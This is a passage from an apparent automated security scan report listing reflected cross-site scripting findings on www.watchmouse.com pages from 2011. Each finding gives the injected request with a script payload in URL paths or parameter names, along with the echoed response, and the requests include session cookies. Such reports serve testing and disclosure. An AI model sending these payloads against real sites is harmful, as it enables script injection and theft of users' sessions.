Pragma: no-cache
Last-Modified:
ETag: "0-en-960d512525d5aadfede9ed6bc4b21f1c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/worldwide.php?41bde"><script>alert(1)</script>c330fe7c84e=1" method="post">
...[SNIP]...

1.241. http://www.watchmouse.com/es/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50843"><script>alert(1)</script>de419318d3b was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=150843"><script>alert(1)</script>de419318d3b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7544b909c71ca1b84e7fd5a691036b16"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=150843"><script>alert(1)</script>de419318d3b" method="post">
...[SNIP]...

1.242. http://www.watchmouse.com/es/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bd2"><script>alert(1)</script>541767a909d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es39bd2"><script>alert(1)</script>541767a909d/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-738c1f82501e529dc0a8294d7aa8c73e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es39bd2"><script>alert(1)</script>541767a909d/" method="post">
...[SNIP]...

1.243. http://www.watchmouse.com/es/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a07"><script>alert(1)</script>70e6b4480e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/?a8a07"><script>alert(1)</script>70e6b4480e5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-b6dc7a7a315fe254b82cdced89ee6c50"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/?a8a07"><script>alert(1)</script>70e6b4480e5=1" method="post">
...[SNIP]...

1.244. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81483"><script>alert(1)</script>f25f26fa0b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es81483"><script>alert(1)</script>f25f26fa0b3/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-073e769c4dc112b4bee124efeff04e36"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es81483"><script>alert(1)</script>f25f26fa0b3/feature/public-status-page.html" method="post">
...[SNIP]...

1.245. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c043d"><script>alert(1)</script>8e665d0ff3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/featurec043d"><script>alert(1)</script>8e665d0ff3d/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-d1df99b98c9397290a26ad8915235d23"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/featurec043d"><script>alert(1)</script>8e665d0ff3d/public-status-page.html" method="post">
...[SNIP]...

1.246. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a333"><script>alert(1)</script>887c299eaed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/public-status-page.html2a333"><script>alert(1)</script>887c299eaed HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-8f5f5f4b7cfc602b385d6a823c158215"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/feature/public-status-page.html2a333"><script>alert(1)</script>887c299eaed" method="post">
...[SNIP]...

1.247. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b6d"><script>alert(1)</script>5e8ad6b99f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es29b6d"><script>alert(1)</script>5e8ad6b99f8/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-abd31242d4af91393c76c2ce35c30739"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es29b6d"><script>alert(1)</script>5e8ad6b99f8/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.248. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0739"><script>alert(1)</script>f04d8aa328c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/featuree0739"><script>alert(1)</script>f04d8aa328c/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-703662b09080e7242803a3a2dcc9d6d4"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/featuree0739"><script>alert(1)</script>f04d8aa328c/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.249. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8216d"><script>alert(1)</script>42af676627e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/transaction-monitoring-web-application-testing.html8216d"><script>alert(1)</script>42af676627e HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-ae1a82571973bf14e37457bbf555d82b"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html8216d"><script>alert(1)</script>42af676627e" method="post">
...[SNIP]...

1.250. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a01d"><script>alert(1)</script>3c92cc3fd31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/transaction-monitoring-web-application-testing.html?2a01d"><script>alert(1)</script>3c92cc3fd31=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-8d387855bd801062967559c68a5b20b7"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="/es/feature/transaction-monitoring-web-application-testing.html?2a01d"><script>alert(1)</script>3c92cc3fd31=1" method="post">
...[SNIP]...

1.251. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62876"><script>alert(1)</script>d2d2780bcae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es62876"><script>alert(1)</script>d2d2780bcae/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0a3579cd3b01874a09d3cca2175346c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es62876"><script>alert(1)</script>d2d2780bcae/learn_more.php" method="post">
...[SNIP]...

1.252. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217b6"><script>alert(1)</script>2004774d5d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/learn_more.php217b6"><script>alert(1)</script>2004774d5d3 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7c1339481a4d648e17edf0a1924c1158"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/learn_more.php217b6"><script>alert(1)</script>2004774d5d3" method="post">
...[SNIP]...

1.253. http://www.watchmouse.com/es/learn_more.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf65"><script>alert(1)</script>5359773e6f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/learn_more.php?abf65"><script>alert(1)</script>5359773e6f4=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:08:54 GMT
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/learn_more.php?abf65"><script>alert(1)</script>5359773e6f4=1" method="post">
...[SNIP]...

1.254. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edef"><script>alert(1)</script>9db211844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es8edef"><script>alert(1)</script>9db211844e/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
